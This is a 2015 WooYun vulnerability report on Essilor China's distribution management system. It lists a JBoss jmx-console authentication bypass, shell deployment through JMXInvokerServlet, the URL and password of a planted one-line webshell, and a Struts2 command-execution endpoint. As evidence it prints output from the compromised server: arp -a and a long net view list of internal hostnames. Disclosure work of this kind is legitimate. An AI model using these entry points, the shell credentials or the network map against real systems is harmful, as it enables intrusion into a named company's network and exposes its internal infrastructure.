漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0155544
漏洞标题:essilor依视路某系统漏洞打包可威胁内网
相关厂商:依视路
漏洞作者: 路人甲
提交时间:2015-11-24 17:19
修复时间:2016-01-11 15:32
公开时间:2016-01-11 15:32
漏洞类型:命令执行
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
漏洞打包可威胁内网
详细说明:
http://dms.essilorchina.com:7001/edmsii/
渠道分销管理系统
1#jboss
HEAD绕过认证 http://dms.essilorchina.com:7001/jmx-console
http://dms.essilorchina.com:7001/wooyun/ixm.jsp
直接部署shell:http://dms.essilorchina.com:7001/invoker/JMXInvokerServlet
一句话地址:http://dms.essilorchina.com:7001/is/index.jsp
密码:023
问题2#st2命令执行
http://dms.essilorchina.com:7001/edmsii/purchase/elecdeliverycodemodify.do
漏洞证明:
大量内网机器
<code>
[*] 基本信息 [ A:C:D:F: ]
D:\jboss-4.2.2.GA-edmsii\server\default\.\tmp\deploy\tmp6910068586528377062is-exp.war\> arp -a
Interface: 172.29.172.85 --- 0xc
Internet Address Physical Address Type
172.29.172.1 58-49-3b-a6-9c-11 dynamic
172.29.172.13 00-50-56-bf-16-a3 dynamic
172.29.172.82 00-0c-29-91-38-a2 dynamic
172.29.172.86 00-0c-29-91-38-a3 dynamic
172.29.172.96 00-50-56-bf-24-8a dynamic
172.29.172.200 f0-1f-af-42-61-42 dynamic
172.29.172.235 5c-f9-dd-60-b0-7e dynamic
172.29.172.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
255.255.255.255 ff-ff-ff-ff-ff-ff static
D:\jboss-4.2.2.GA-edmsii\server\default\tmp\deploy\tmp6910068586528377062is-exp.war\> net view
Server Name Remark
-------------------------------------------------------------------------------
\\ASES0000
\\ASES9602
\\AUED1267
\\AUED3566
\\AUES0031 SD/AM Server
\\AUESPD00001
\\AUESPD00005
\\AUESPD00017
\\AUESPD00025
\\AUESPD35010
\\AUESPD35013
\\AUESPL00011
\\AUESPL00022
\\AUESPL00064
\\AUESPL00068
\\AUESPL00075
\\AULD1203
\\AULD1216
\\AULD1758
\\AULD1814
\\AULD1860
\\AULD1897
\\AULD3511
\\AULD3538
\\AULD3541
\\AULD3568
\\AULD3589
\\AULD3597
\\AULI1201
\\AULI1202
\\AULI1701
\\AULI3501
\\AULI3502
\\AULI7001
\\AULR3541 TECB LMS
\\AULR3549
\\AULS0007
\\AULS0008 ETC Labmaster
\\AULS0012
\\AULS0034
\\AULS0035
\\AULS0036
\\AULS0038
\\AULS0039
\\AULS0060
\\AULS1208
\\AULS1209
\\AULS1212
\\AULS1231
\\AULS1707
\\AULS1708
\\AULS1712
\\AULS1731
\\AULS1812
\\AULS1831
\\AULS3508
\\AULS3509
\\AULS3510
\\AULS3512
\\AULS3531
\\AULS3539 PSG
\\AULS3542
\\AULS3548
\\AULS3553
\\AULS3554
\\AULS3557
\\AULS3559
\\AULS3560
\\AULS3566
\\AULS3569
\\AULS7016
\\CITSERVER
\\CNED0083
\\CNED0142
\\CNED0149
\\CNED0153
\\CNED0154
\\CNED0175
\\CNED0188
\\CNED0189
\\CNED0392
\\CNED0393
\\CNER0002
\\CNER0004
\\CNER0005
\\CNER0008
\\CNER0010 Rx Foco Server
\\CNER0011
\\CNER0012
\\CNER0013
\\CNER0014
\\CNER0015
\\CNER0017
\\CNER0018
\\CNER0019
\\CNER0020
\\CNER1001
\\CNER1002
\\CNER1003
\\CNER1004
\\CNER1006
\\CNER1007
\\CNER1301
\\CNER1601
\\CNER3001
\\CNER3002
\\CNER3003
\\CNER3004
\\CNER3005
\\CNESED20004
\\CNESPD20012
\\CNESPD20029
\\CNESPD20038
\\CNESPD20039
\\CNESPD20047
\\CNESPD20067
\\CNESPD20076
\\CNESPD20095
\\CNESPD20106
\\CNESPL21033
\\CNESPL21057
\\CNESPL21083
\\CNESPL21093
\\CNESPL21111
\\CNESPL21122
\\CNESPL21141
\\CNESPL21143
\\CNESPL21145
\\CNESPL21151
\\CNESPL21172
\\CNESPL21178
\\CNESPL21181
\\CNESPL21187
\\CNESPL21193
\\CNESPL21212
\\CNESPL22003
\\CNESPL22021
\\CNESPL22044
\\CNESSD00234
\\CNESSD00243
\\CNESSD00267
\\CNESSD00295
\\CNESSD00301
\\CNESSD00305
\\CNESSD00336
\\CNESSD00380
\\CNESSD00381
\\CNESSD00382
\\CNESSD00384
\\CNESSD00387
\\CNESSD00413
\\CNESSD00417
\\CNESSD00424
\\CNESSD00449
\\CNESSD00452
\\CNESSL21006
\\CNESSL21013
\\CNLD3009
\\CNLD3011
\\CNLD3015
\\CNLD3016
\\CNLD3037
\\CNLD3038
\\CNLR1028
\\CNLR1029
\\CNLR1030
\\CNLS1001
\\CNLS1007
\\CNLS1008
\\CNLS1011
\\CNLS1013
\\CNLS1030
\\CNLS3010
\\CNLS9605
\\CNST2010
\\DLINK-25629E
\\DLINK-256328
\\DS713
\\ESSILORI
\\FREW0337
\\HKESED00034
\\HKESED00036
\\HKESED00041
\\HKESED00047
\\HKESED00048
\\HKESED00049
\\HKESED00050
\\HKESED00051
\\HKESED00059
\\HKESED00062
\\HKESED00073
\\HKESED00074
\\HKESED00075
\\HKESED00078
\\HKESED10001
\\HKESED10002
\\HKESPD00052
\\HKESPD00053
\\HKESPD00054
\\HKESPD00068
\\HKESPD10029
\\HKESPL00033
\\HKESPL00034
\\HKESPL00038
\\HKESPL00039
\\HKESPL00051
\\HKESPL00055
\\HKESPL00058
\\HKESPL00059
\\HKESSD00058
\\HKESSD00060
\\HKESSD00067
\\HKESSD00071
\\HKESSD00072
\\HKESSD10003
\\HKESSD10033
\\HKESSD10035
\\HKESSD10036
\\HKESSL00021
\\HKESSL00053
\\HKLD0044
\\HKLD0045
\\HKLD0046
\\HKLD1025
\\HKLD1027
\\HKLL1004
\\HKLR0001
\\HKLS0001
\\HKLS0002
\\HKLS0007
\\HKLS0008
\\HKLS1002
\\IDESSD00036
\\IDESSD00046
\\IDLS0005
\\IDLS0011
\\INLD1045
\\INLD1102
\\INLD1124
\\INLD1149
\\INLD1156
\\INLD1171
\\INLD1177
\\INLD1180
\\INLD1182
\\INLD12242
\\INLD1251
\\INLD1267
\\INLD1273
\\INLD1276
\\INLD1277
\\INLD1284
\\INLD1288
\\INLD1293
\\INLD1303
\\INLD1317
\\INLD1332
\\INLD1337
\\INLD1342
\\INLD1343
\\INLD1365
\\INLD1370
\\INLD1375
\\INLD1401
\\INLD14185
\\INLD1419
\\INLD1426
\\INLD1429
\\INLD1445
\\INLD1458
\\INLD1461
\\INLD1463
\\INLD1465
\\INLD1466
\\INLD1483
\\INLD1900
\\INLD2003
\\INLD3530 inld3530
\\INLD3755
\\INLD3758
\\INLD3910
\\INLD3920
\\INLD4002
\\INLD5602
\\INLD6030
\\INLD6210
\\INLD7006
\\INLD8006
\\INLD8007
\\INLD8009
\\INLD8010
\\INLD8012
\\INLD8014
\\INLD8017
\\INLD8019
\\INLD8020
\\INLD8022
\\INLD8023
\\INLD8024
\\INLD8025
\\INLD8026
\\INLD8027
\\INLD8028
\\INLL1120
\\INLL1136
\\INLL1198
\\INLL1233
\\INLL1247
\\INLL1248
\\INLL1316
\\INLL1325
\\INLL1342
\\INLL1371
\\INLL8000
\\INLL8007
\\INLL8014
\\INLL8016
\\INLL8018
\\INLL8020
\\INLL8022
\\INLL8026
\\INLL8029
\\INLL8031
\\INLL8037
\\INLL8045
\\INLL8048
\\INLL8049
\\INLL8050
\\INLL8053
\\INLL8054
\\INLL8058
\\INLL8068
\\INLL8069 Suraj Hayathbabu Computer
\\INLR0001
\\INLR0002
\\INLR0003
\\INLR0004
\\INLR0005
\\INLR0010
\\INLR0011
\\INLR0012
\\INLR0013
\\INLR0015
\\INLR0017
\\INLR0019
\\INLR0026
\\INLR0027
\\INLR0028
\\INLR0050
\\INLR1010
\\INLR1017
\\INLR1022
\\INLR1025
\\INLR1027
\\INLR1028
\\INLR1030
\\INLR1031
\\INLR1032
\\INLR1033
\\INLR1034
\\INLR1037
\\INLR1038
\\INLR1044
\\INLR1047
\\INLR3900
\\INLR4003
\\INLR5601
\\INLS0035
\\INLS1006
\\INLS1007
\\INLS1008
\\INLS1009
\\INLS1011
\\INLS1015
\\INLS1017
\\INLS1024
\\INLS1025
\\INLS1026
\\INLS1041
\\INLS1042
\\INLS1046
\\INLS1047
\\INLS1090
\\INLS3500
\\INLS3501
\\INLS6001
\\INLS6002
\\INLY1002
\\INLY1003
\\INLY8001
\\INMAED00011
\\INMAED00026
\\INMAED00038
\\INMAPD00004
\\INMAPD00005
\\INMAPD00030
\\INMAPD00031
\\INMAPD00032
\\INMAPD00033
\\INMAPD00034
\\INMAPD00035
\\INMASD00005
\\INMASD00007
\\INMASD00008
\\INMASD00011
\\INMASD00012
\\INMASD00013
\\INMASD00020
\\INMASD00021
\\INMASD00024
\\INMASD00025
\\INMASD00028
\\INMASL00011
\\INMASL00016
\\INMASL00023
\\INMD0057
\\INML0038
\\INMS0001
\\INMS0002
\\INMS0003
\\INVS0160
\\INVS0165
\\INVS0166
\\INVS0167
\\INVS8002
\\INVS8007
\\INVS8008
\\INVS8013
\\INVS8014
\\INVS8015
\\INVS8016
\\KHESPD00004
\\KHLS0001
\\KRESPD05519
\\KRESPD05525
\\KRESPD05531
\\KRESPD31106
\\KRESPD31109
\\KRESPD31113
\\KRESPD31114
\\KRESPD31117
\\KRESPD31119
\\KRESPD31120
\\KRESPD32203
\\KRESPD35509
\\KRESPD35511
\\KRESPD35512
\\KRESPD35513
\\KRESPD35515
\\KRESPD36604
\\KRESPD36605
\\KRESPL00008
\\KRESPL00009
\\KRESPL03307
\\KRESPL03308
\\KRESPL03310
\\KRESPL04413
\\KRESPL04415
\\KRESPL04418
\\KRESPL04420
\\KRESPL06608
\\KRESPL06610
\\KRESPL30009
\\KRESPL31104
\\KRESPL32209
\\KRESPL35509
\\KRESPL35510
\\KRESPL37707
\\KRLD0522
\\KRLD3119
\\KRLD3513
\\KRLL0414
\\KRLS0002
\\KRLS0004
\\KRLS0012
\\KRLS0021
\\KRLS0022
\\KRLS0024
\\KRLS0025
\\KRLS0026
\\KRLS0027
\\KRLS0028
\\KRLS0031
\\KRLS0041
\\KRLS3010
\\KRLS3041
\\KRLS3303
\\KRLS3308
\\MYESSD00022
\\MYESSD00023
\\MYESSD00025
\\MYLS0009
\\NZES0004
\\NZES0017
\\NZESPD01147
\\NZLD0697
\\NZLS0001
\\NZLS0032
\\NZLS1002
\\NZLS1003
\\NZLS1006
\\NZLS1016
\\NZLS1017
\\NZLS1024
\\NZLS1025
\\PHER1003
\\PHESPD00384
\\PHESPD90000
\\PHESPD90001
\\PHESPD90002
\\PHESPD90005
\\PHESPD90006
\\PHESPD90008
\\PHESPD90009
\\PHESPD90010
\\PHESPD90012
\\PHESPD90013
\\PHESPD90014
\\PHESPD90019
\\PHESPD90020
\\PHESPD90021
\\PHESPD90023
\\PHESPD90025
\\PHESPD90026
\\PHESPL00004
\\PHESPL00023
\\PHESPL90009
\\PHESPL90015
\\PHESPL90018
\\PHESPL90021
\\PHESSD00008
\\PHESSD00096
\\PHESSD00308
\\PHESSD00310
\\PHESSD00311
\\PHESSD00318
\\PHESSD00319
\\PHESSD00320
\\PHESSD00326
\\PHESSD00330
\\PHESSD00337
\\PHESSD00348
\\PHESSD00359
\\PHESSD00360
\\PHESSD00364
\\PHESSD00366
\\PHESSD00373
\\PHESSD00375
\\PHESSD00378
\\PHESSD00379
\\PHESSD00382
\\PHESSD00385
\\PHESSD00388
\\PHESSD00389
\\PHESSD00392
\\PHESSD00393
\\PHESSD00395
\\PHESSD00397
\\PHESSD00399
\\PHESSD00406
\\PHESSD00412
\\PHESSD00414
\\PHESSD00416
\\PHESSD00418
\\PHESSD00420
\\PHESSD00424
\\PHESSD00425
\\PHESSD00426
\\PHESSD00435
\\PHESSD00446
\\PHESSD00447
\\PHESSD00464
\\PHESSL00020
\\PHLS0001
\\PHLS0002
\\PHLS0005
\\PHLS0006
\\PHLS3001
\\PHMD0028 Carry50 Spectro Lab Workstation
\\PHMD0196 SATOWIN
\\PHMD0199 Molds Engraving
\\PHMD0215 HMC Encoding
\\PHMD0306 essilor
\\PHMD0528
\\PHMD0529
\\PHMD0535
\\PHMR0007
\\PHMR0008
\\PHMR0009
\\PHMR0013
\\PHMS0003 File Server/WKs Backup/SAP Server
\\PHMS0006
\\SGES0033
\\SGES0037
\\SGES0043 SGES0043
\\SGES0044
\\SGES0049
\\SGES0051
\\SGES0052
\\SGES0060
\\SGES0110
\\SGES0111
\\SGES0112
\\SGES0113
\\SGESPD00067
\\SGESPD00071
\\SGESPD10010
\\SGESPD10029
\\SGESPD10030
\\SGESPD10031
\\SGESPD10032
\\SGESPL00312
\\SGESPL00317 WL
\\SGESPL00333
\\SGESPL00339
\\SGESPL00344
\\SGESPL00346
\\SGESPL00350
\\SGESPL00352
\\SGESPL00358
\\SGESPL00380
\\SGESPL00448
\\SGESPL00479
\\SGESPL10008
\\SGESPL10028
\\SGESPL60014
\\SGESSD10035
\\SGESSD60012
\\SGESSD60014
\\SGESSD60016 SGESSD60016
\\SGESSL00324
\\SGESSL10006
\\SGEV0100
\\SGEV0102
\\SGEV0104
\\SGLS6002
\\SGLS6003
\\SHARE_INCHEON
\\SHARE_SEOUL
\\SHFD0001
\\THED1134
\\THED1135
\\THEE3029
\\THEE3030
\\THER0001
\\THER0003
\\THES0001 THES0001
\\THES0002
\\THES0003
\\THES9601 THES9601
\\THESED00040
\\THESED00076
\\THESED30002
\\THESED30003
\\THESED30005
\\THESED30017
\\THESED30018
\\THESED30037
\\THESEL09028
\\THESPL00012
\\THESPL00044
\\THESPL00101
\\THESPL00147
\\THESPL00160
\\THESPL00169
\\THESPL00175
\\THESPL00200
\\THESPL08061
\\THESPL08079
\\THESPL08086
\\THESPL08098
\\THESPL08136
\\THESPL09039
\\THESPL09043
\\THESPL09076
\\THESPL09082
\\THESPL09102
\\THESSD00012
\\THESSD00019
\\THESSD00185
\\THESSD00186
\\THESSD00221
\\THESSD00223
\\THESSL00136
\\THESSL00154
\\THESSL00203
\\THESSL00239
\\THESSL00253
\\THESSL00289
\\THESSL08022
\\THESSL08026
\\THESSL08036
\\THESSL08129
\\THESSL09058
\\THESSL09059
\\THESSL09078
\\THESSL09081
\\THESSL09094
\\THESSL09096
\\THESSL09116
\\THESSL09133
\\THESSL09147
\\THESSL09152
\\THLAPL01057
\\THLM1103
\\THLM1104
\\THLR0011
\\THLR0012
\\THLR0013
\\THLR0014
\\THLR0021
\\THLR0023
\\THLR0026
\\THLR0027
\\THLR0028
\\THLR0030
\\THLR0031
\\THLR0039
\\THLR0045
\\THLR0122
\\THLR0123
\\THLR0124
\\THLR0125
\\THLR0126
\\THLS0031
\\THLS0033 HRM Payroll Server
\\THLS0034
\\THLS0036
\\THLS0037
\\THLS0038
\\THLS0040
\\THLS0041
\\THMR0020
\\THMR0022
\\THMR0023
\\THMR0028
\\THMR0031
\\THMR0032
\\THMR0033
\\THMR0034
\\THMR0036
\\THMR0037
\\THMR0038
\\THMR0039
\\THMR0040
\\THMR0042
\\THMR0043
\\THMR0044
\\THMR0046
\\THMR0047
\\THMR0048
\\THMR0049
\\THMR0051
\\THMR0052
\\THMR0053
\\THMR0054
\\THMR0055
\\THMR0056
\\THMR0057
\\THMR0058
\\THMR0060
\\THMR0061
\\THMR0062
\\THMR0063
\\THMR0065
\\THMR0066
\\THMR0068
\\THMR0069
\\THMR0070
\\THMR0071
\\THMR0075
\\THMR0076
\\THMR0077
\\THMR0078
\\THMR0079
\\THMS0001
\\THMS0002
\\THMV1003
\\THMV1004
\\TWLS2005
\\TWLS3001
\\TWLS9601 Essilor-Polylite TAIWAN (Taipei)
\\TWPD1280
\\TWPD1557
\\TWPD1560 0829-RV6 R87EBTK
\\TWPD1635
\\TWPD1636
\\TWPD1639
\\TWPD1683
\\TWPD1696
\\TWPD2322
\\TWPD2325
\\TWPL1210
\\TWPL1351
\\TWPL1352
\\TWPL1606
修复方案:
补丁
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝